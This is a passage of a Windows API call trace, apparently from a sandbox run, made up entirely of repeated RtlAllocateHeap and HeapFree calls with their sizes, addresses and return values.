hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.824] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.824] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.824] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.824] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.824] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.824] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.824] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.824] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.824] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.824] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.824] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.824] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.824] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.824] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.825] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.825] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.825] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.825] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.825] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.825] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.825] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.825] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.825] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.825] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.825] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.825] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.825] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.825] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.825] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.825] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.825] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.825] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.825] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.825] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.825] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.825] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.825] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.825] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.825] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.825] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.825] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.825] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.825] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.825] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.825] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.825] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.825] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.825] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.825] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.825] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.825] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.826] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.826] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.826] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.826] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.826] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.826] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.826] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.826] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.826] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.826] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.826] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.826] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.826] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.826] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.826] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.826] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.826] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.826] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.826] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.826] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.826] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.826] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.826] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.826] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.826] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.826] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.826] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.826] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.826] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.826] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.826] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.826] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.826] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.826] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.826] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.826] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.827] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.827] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.827] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.827] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.827] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.827] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.827] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.827] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.827] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.827] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.827] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.827] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.827] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.827] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.827] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.827] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.827] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.827] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.827] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.827] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.827] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.827] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.827] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.827] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.827] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.827] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.827] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.827] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.827] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.827] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.827] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.827] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.827] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.827] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.827] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.827] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.827] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.828] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.828] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.828] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.828] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.828] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.828] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.828] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.828] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.828] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.828] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.828] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.828] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.828] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.828] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.828] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.828] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.828] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.828] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.828] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.828] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.828] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.828] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.828] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.828] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.828] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.828] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.828] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.828] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.828] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.828] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.828] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.828] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.828] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.828] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.828] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.828] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.829] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.829] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.829] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.829] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.829] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.829] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.829] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.829] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.829] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.829] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.829] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.829] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.829] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.829] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.829] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.829] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.829] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.829] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.829] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.829] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.829] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.829] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.829] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.829] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.829] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.829] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.829] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.829] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.829] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.829] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.829] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.829] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.829] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.829] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.829] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.829] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.829] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.830] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.830] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.830] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.830] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.830] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.830] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.830] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.830] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.830] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.830] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.830] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.830] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.830] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.830] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.830] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.830] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.830] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.830] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.830] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.830] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.830] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.830] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.830] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.830] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.830] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.830] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.830] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.830] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.830] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.830] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.830] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.830] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.830] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.830] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.830] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.830] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.830] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.831] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.831] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.831] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.831] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.831] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.831] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.831] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.831] HeapFree (in: hHeap=0x6e0000, 